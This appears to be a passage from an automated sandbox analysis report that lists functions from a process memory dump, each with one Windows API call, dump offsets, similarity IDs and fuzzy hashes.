                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: d09368128bfaa23ad6edda13b1875f8a78a75c5fdfae7c762b23b67e689b49e1
                                                                                            • Instruction ID: 137cda7d897b743de04f5f83d05924d7e078035e4dc5f4638d33d90850a682bb
                                                                                            • Opcode Fuzzy Hash: d09368128bfaa23ad6edda13b1875f8a78a75c5fdfae7c762b23b67e689b49e1
                                                                                            • Instruction Fuzzy Hash: B42181765093C09FEB128B25DC55A92BFE4EF07220F0984DBDD858F263D264A948DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D7AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 0542fa97bfdcdcaef83cf5dcfba376855ff7ee5abfeed8bbc7723a16bfe1f114
                                                                                            • Instruction ID: 571ceb58376868fc2f025f3cbb8c9b97308e43e775afc3ba741e18332e17b4d4
                                                                                            • Opcode Fuzzy Hash: 0542fa97bfdcdcaef83cf5dcfba376855ff7ee5abfeed8bbc7723a16bfe1f114
                                                                                            • Instruction Fuzzy Hash: 072172716053809FEB22CF29DC45B66BFE8EF56610F0884AAED49CB253E265E404CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028410D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: cee263532975c3a5973b84ec51ad8ca16d6e0c479102cded587e68a1c33f2877
                                                                                            • Instruction ID: 0d0d6cb977fc1306ada969be4bcc7d4237ec6aa3a12e6838015d1642ab8e7525
                                                                                            • Opcode Fuzzy Hash: cee263532975c3a5973b84ec51ad8ca16d6e0c479102cded587e68a1c33f2877
                                                                                            • Instruction Fuzzy Hash: 6D216D6540E3C49FD7138B259C54A62BFB4EF57620F0980DBD8898F2A3D6696808D772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 01D7AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 17a6e9f4bd5827f1375eea1dc9ae11820a97119d9bed8a0f022966ae2d588f44
                                                                                            • Instruction ID: 4cd6bfb2ff6961e1ccaae95533a98e232bf52222cc88da00711453fd42d934b7
                                                                                            • Opcode Fuzzy Hash: 17a6e9f4bd5827f1375eea1dc9ae11820a97119d9bed8a0f022966ae2d588f44
                                                                                            • Instruction Fuzzy Hash: 6D11C472500300EFEB21DF55DC45BAAFBA8EF44720F14846AFD45CB281D670E9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 028408E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: e82aca53fe8941190f5f173aa875d9027025a06fdbd860cf14fc7e5cc68a791e
                                                                                            • Instruction ID: 3707a0ff3b0e59dbf16316d149f9113bd7e5de1e7b1b4094a9100ec8bab24c9f
                                                                                            • Opcode Fuzzy Hash: e82aca53fe8941190f5f173aa875d9027025a06fdbd860cf14fc7e5cc68a791e
                                                                                            • Instruction Fuzzy Hash: ED11EF76000308EFEB21CF50DC44FA7FBA8EF04720F14885AEE099A241D670A504CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D7BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: e45cb6dd3ada510fc4c9e1a27788fa6335eeb2440890999b93532fc4881dd3b1
                                                                                            • Instruction ID: 35a35586901a2ba5e652395f28ec3144fba9ea21ac292ab9d894409d8ca2c803
                                                                                            • Opcode Fuzzy Hash: e45cb6dd3ada510fc4c9e1a27788fa6335eeb2440890999b93532fc4881dd3b1
                                                                                            • Instruction Fuzzy Hash: AD116D72509384AFDB22CF65DC45B53FFF4EF09210F08849AE9898B662D375E418DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028412D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: f7f2b0d28aacd5813fdfa4b70afed77b4a1f04a4f43dc61d262a3956074716d7
                                                                                            • Instruction ID: 409d46c304d5809a93be95530d73115dc45a4b1370342bf5adea6d2889b8fcad
                                                                                            • Opcode Fuzzy Hash: f7f2b0d28aacd5813fdfa4b70afed77b4a1f04a4f43dc61d262a3956074716d7
                                                                                            • Instruction Fuzzy Hash: 5711C1755093849FDB218F25DC49B96FFE4EF06220F0884EEED498B252D339A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: 7799ce3b36d5dc386eb70ab7357fa946172e192d701176d49e21b4bf612905c0
                                                                                            • Instruction ID: d3e2d98841225ec4c5fe920981c693d291f464ef68437b7160dc190439917faa
                                                                                            • Opcode Fuzzy Hash: 7799ce3b36d5dc386eb70ab7357fa946172e192d701176d49e21b4bf612905c0
                                                                                            • Instruction Fuzzy Hash: 72114F715093C49FEB128F15DC54A62BFB4DF47614F1880DBEDC58F253D265A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028405E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: b519687793687ef6910b1352870a8b912f6d17eb94111edc31c4223523f3c3df
                                                                                            • Instruction ID: f20cfef83cb90b575d2a01d6a683d7188715116109ef09d3eaae0a7e97141d99
                                                                                            • Opcode Fuzzy Hash: b519687793687ef6910b1352870a8b912f6d17eb94111edc31c4223523f3c3df
                                                                                            • Instruction Fuzzy Hash: 4611E9755093C49FDB128B15DC55B52FFB4DF43220F0880DBED858B653D275A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 4859f406f640b6460a8a4f8226ec6585dc6db286750074a6f5e20415503d1f28
                                                                                            • Instruction ID: 23c8d558987be9cb70bf37c9d33f7486dcdb9c7d7d11898467c9b9abfe19f957
                                                                                            • Opcode Fuzzy Hash: 4859f406f640b6460a8a4f8226ec6585dc6db286750074a6f5e20415503d1f28
                                                                                            • Instruction Fuzzy Hash: 3111BF754093C49FE712CB25DC59B92FFB4EF07324F0980DADD888B263D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D7AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: ffa2c4847fe962295f4949ba691e2f25db7cdfd9ab392d4b1687562ad0e79bdb
                                                                                            • Instruction ID: ec2ac5610c9dc631ddf834553b0020297a321342b6805df71a1489b425962913
                                                                                            • Opcode Fuzzy Hash: ffa2c4847fe962295f4949ba691e2f25db7cdfd9ab392d4b1687562ad0e79bdb
                                                                                            • Instruction Fuzzy Hash: C01161B16003009FEB20DF29DC85B6AFBD8EF14621F08C46AED49CB642E674E404CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01D7AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 3954a1db33b9a14615a2e47f8814e57db8b96055162a46e2a1a0879cff843c63
                                                                                            • Instruction ID: 6cce73f6e7ddc41ee1627020cbfa4c6849ac37e10b72b80fdfa9305de3b5c5db
                                                                                            • Opcode Fuzzy Hash: 3954a1db33b9a14615a2e47f8814e57db8b96055162a46e2a1a0879cff843c63
                                                                                            • Instruction Fuzzy Hash: 7211A37540D7C09FD7128B15DC85B92BFB4EF07224F0980DBDD858F263D269A909DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028407C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F3C28CC5,00000000,00000000,00000000,00000000), ref: 02840819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 8a91a365bc35e1940d2310cec1868a7717fd5821c0b9aa57266671a689a3a4e9
                                                                                            • Instruction ID: 37f129fc17968174f7f6f9987d677664d0d876b685bdcd5a53e2f5082e18a4d1
                                                                                            • Opcode Fuzzy Hash: 8a91a365bc35e1940d2310cec1868a7717fd5821c0b9aa57266671a689a3a4e9
                                                                                            • Instruction Fuzzy Hash: 9D018079500708EFFB209F15DD85BA7FB98DF44721F14809AEE099A241DA74A904CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028413AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 868985039d7f1ff9ec43387b157f36618cd976cf96d602cac1181787656a9126
                                                                                            • Instruction ID: 42396b6b051f54d89a352cedd66f261ba9cf23e3081fd488337247eef9c752c1
                                                                                            • Opcode Fuzzy Hash: 868985039d7f1ff9ec43387b157f36618cd976cf96d602cac1181787656a9126
                                                                                            • Instruction Fuzzy Hash: E9118E79500704DFEB20CF55DC89B66FBA4EF04624F08C4AADD49CB652D775E444CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01D7ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: c109e5d905b23bb2771938014c16a8d81b65d12de42abcd1dca7850c6c378606
                                                                                            • Instruction ID: 693ca4a00c1dbdf5814d25e071327fc4b716bb2597e5d1f262e61a171ec8d587
                                                                                            • Opcode Fuzzy Hash: c109e5d905b23bb2771938014c16a8d81b65d12de42abcd1dca7850c6c378606
                                                                                            • Instruction Fuzzy Hash: AF11CEB54093809FEB11CF25DC85B92BFA4EF02220F0984ABED488F253D274A508CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D7BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 2b6098781d228c821a6a5ddfcf9f49449824bafc17cc46c3631c6ab7c3ed21be
                                                                                            • Instruction ID: 39eed5df7f70f14581cdeb3b4e1cb57bf688c94d728c6c74a382f7fbb2f8c106
                                                                                            • Opcode Fuzzy Hash: 2b6098781d228c821a6a5ddfcf9f49449824bafc17cc46c3631c6ab7c3ed21be
                                                                                            • Instruction Fuzzy Hash: 01115E72504704DFEB21EF59DC45B53FFE4EF08611F0885AADD898A612E371E414DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: fb0877554a2c45c55dae482c0193ead1b8eb3fb43befbd6e73a1c0e1c329e60b
                                                                                            • Instruction ID: 901926b98198c328bab6ad671ee869e271356316500600c725a755037290b7c6
                                                                                            • Opcode Fuzzy Hash: fb0877554a2c45c55dae482c0193ead1b8eb3fb43befbd6e73a1c0e1c329e60b
                                                                                            • Instruction Fuzzy Hash: D5019E796043488FEB10DF29DC85766FBA8EB00625F1884AADE09CB642EB74E404CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 418c3a77e44ad9426647141e75c01baed87afff9c6446503788f6bdfed3619e5
                                                                                            • Instruction ID: 9784e84b6caf141f6760dc7c34aaf13f0b9bc10d2ee877972a4883dfc6fcf905
                                                                                            • Opcode Fuzzy Hash: 418c3a77e44ad9426647141e75c01baed87afff9c6446503788f6bdfed3619e5
                                                                                            • Instruction Fuzzy Hash: 0A017171900700AFE350DF16DC46B66FBA8FB84A20F14816AED099B741D335F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D7A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 85ab1d8296d99093ca5b6f92580f8f634b936ab7c126ff93fe7da9613b1201aa
                                                                                            • Instruction ID: fcf2f42b63be6d01ea15ae7ee6f73e53aad68acf12c8eaa6e0ca3c066cf79816
                                                                                            • Opcode Fuzzy Hash: 85ab1d8296d99093ca5b6f92580f8f634b936ab7c126ff93fe7da9613b1201aa
                                                                                            • Instruction Fuzzy Hash: 75017171900700AFE710DF16DC46B66FBA8FB84A20F14816AED089B741D235F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028412FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: f8aef3397c285f8d21df29e0ea5901cd55b39ce798629eb4ca0584f11dd85de7
                                                                                            • Instruction ID: 5934a39e0989804bd0fda5d1d1213831f6324590166d344c0dd4856e8a20376e
                                                                                            • Opcode Fuzzy Hash: f8aef3397c285f8d21df29e0ea5901cd55b39ce798629eb4ca0584f11dd85de7
                                                                                            • Instruction Fuzzy Hash: 2101BC79504304DFEF208F19DC897A5FBA4EF04624F08C4AADC09CBA42D679A444CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D7BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 2dfcb671c000634f662ee065e24e815118b159f56ecf9cb8694ed2cc05539cf7
                                                                                            • Instruction ID: 90640383be031557e2cb754adb42aad584db9721e17eadd97356071d37cf07ef
                                                                                            • Opcode Fuzzy Hash: 2dfcb671c000634f662ee065e24e815118b159f56ecf9cb8694ed2cc05539cf7
                                                                                            • Instruction Fuzzy Hash: 6101DF71500300DFEB20CF19DC897A5FBA4EF04620F08C4ABDD498B656E275E804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028404B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 34bff3d54f006a25c5bdbed2b22acc306574847439e7cca9a284308937b4662f
                                                                                            • Instruction ID: f2e5add64f35cece2369b28c3c245503657ede3e5a80c0089a9c64e2fb325a7d
                                                                                            • Opcode Fuzzy Hash: 34bff3d54f006a25c5bdbed2b22acc306574847439e7cca9a284308937b4662f
                                                                                            • Instruction Fuzzy Hash: 66016271900700ABD350DF16DC46B26FBA4FB88B20F14815AED089B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: f3a84d30f63da01f7fa8af111f03ebefca1857155fb90af0323dacaf23cc2502
                                                                                            • Instruction ID: 8bd2eb8e2cf2231c424597b97dd71e5895409480c4e78ccc81767df3c879e620
                                                                                            • Opcode Fuzzy Hash: f3a84d30f63da01f7fa8af111f03ebefca1857155fb90af0323dacaf23cc2502
                                                                                            • Instruction Fuzzy Hash: 84017C79504348DFEB10DF15D885B66FB94EB00624F1885AADD09CFA86EB78E404CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D7A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: b113a881db4d07dcaa0680e55085e29d00d50d6615e3f55fbb3b29571ce37744
                                                                                            • Instruction ID: 5028c58b83a8f685ee0aad67cfdba720cf20f084158575264c38dbab832e16bc
                                                                                            • Opcode Fuzzy Hash: b113a881db4d07dcaa0680e55085e29d00d50d6615e3f55fbb3b29571ce37744
                                                                                            • Instruction Fuzzy Hash: B5016271900700ABD350DF16DC46B26FBA4FB88B20F14815AED089B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 1f8731952b8a8494642234376ff4ab34a42dc3f9b88639b8d1addd5929bc12c9
                                                                                            • Instruction ID: abdcab1a6d311f00c8018d6c6a35d4b0e42ae7c4e7e058d0781d5ca2907df90b
                                                                                            • Opcode Fuzzy Hash: 1f8731952b8a8494642234376ff4ab34a42dc3f9b88639b8d1addd5929bc12c9
                                                                                            • Instruction Fuzzy Hash: C401F479500708CFEB108F19DC85762FBA0EF41624F08C0AADD0A8B753D774E404DAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01D7ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 4eb645ba67b94a91cbe13892776c434350f4de1d3f2e5cd7d4a2de8e69a9d7e4
                                                                                            • Instruction ID: 42f06cb7695bf1ff2c7a2d7e54227cd00d1ac90d0bf437036edb9cabb6ddab61
                                                                                            • Opcode Fuzzy Hash: 4eb645ba67b94a91cbe13892776c434350f4de1d3f2e5cd7d4a2de8e69a9d7e4
                                                                                            • Instruction Fuzzy Hash: 6001DC31404340DFEB10DF19DC89BA6FBA4EF04620F48C8ABDD098F202E674E404CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02841116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 250d636503d1c177a9df30d5d7feb155d984c82b5cdd78064c7e6d0a985acb51
                                                                                            • Instruction ID: d6d91ba4fd0f26aa06534915f49336ed3ba01da86614e63da3e424cf7e012877
                                                                                            • Opcode Fuzzy Hash: 250d636503d1c177a9df30d5d7feb155d984c82b5cdd78064c7e6d0a985acb51
                                                                                            • Instruction Fuzzy Hash: EAF0AF39504748DFEB20CF05DC89765FBA4EF05A25F08C09ADD4D8B716DA75A484CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2164090762.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: f2f72979f91c42f69e7b2df76b0544fd2f0d6b80d4d51f3bf1572abd82ad9d17
                                                                                            • Instruction ID: 49ca2547ff8ed9ea761f08726d50063bee2401e29a4a1b94c99344836d7a5c2d
                                                                                            • Opcode Fuzzy Hash: f2f72979f91c42f69e7b2df76b0544fd2f0d6b80d4d51f3bf1572abd82ad9d17
                                                                                            • Instruction Fuzzy Hash: 24F0C239504748DFEB20DF15D889766FFA0EF14726F08C09ADE498B716D775E404CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: 0c6364687da2c657c71ad30d80f395dd2e215c9a8655a74977f0cd57ba5ff7f6
                                                                                            • Instruction ID: 1dfc63b29010dbeba738a80563834506e2dce5d6b880b8635ed822fd2a6af2b3
